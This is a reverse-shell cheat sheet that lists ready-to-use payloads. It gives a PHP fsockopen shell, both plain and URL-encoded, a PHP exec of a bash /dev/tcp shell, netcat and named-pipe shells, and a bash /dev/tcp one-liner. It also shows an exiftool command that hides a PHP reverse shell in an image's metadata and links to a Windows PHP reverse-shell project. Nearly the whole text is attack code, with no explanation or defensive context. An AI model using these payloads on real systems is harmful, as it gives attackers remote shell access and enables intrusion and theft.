Reverse Shell Cheat Sheet
PHP
- Oneliner
php -r '$sock=fsockopen("172.16.1.1",4445);exec("/bin/sh -i <&3 >&3 2>&3");'
- Same using URL encoding
php%20-r%20%27%24sock%3Dfsockopen%28%22172.16.1.1%22%2C4445%29%3Bexec%28%22%2Fbin%2Fsh%20-i%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'");
- Reverse-shell payload Windows
https://github.com/Dhayalanb/windows-php-reverse-shell
Netcat
nc 172.16.1.1 4545 -e /bin/sh
mknod /tmp/backpipe p
/bin/sh 0</tmp/backpipe | nc 172.16.1.1 4444 1>/tmp/backpipe
Bash
bash -i >& /dev/tcp/<IP>/<PORT> 0>&1
Exif of a file with php
exiftool -Comment='<?php $sock = fsockopen("<IPADDRESS>",<PORT>);$proc = proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock), $pipes); ?>' <IMAGE>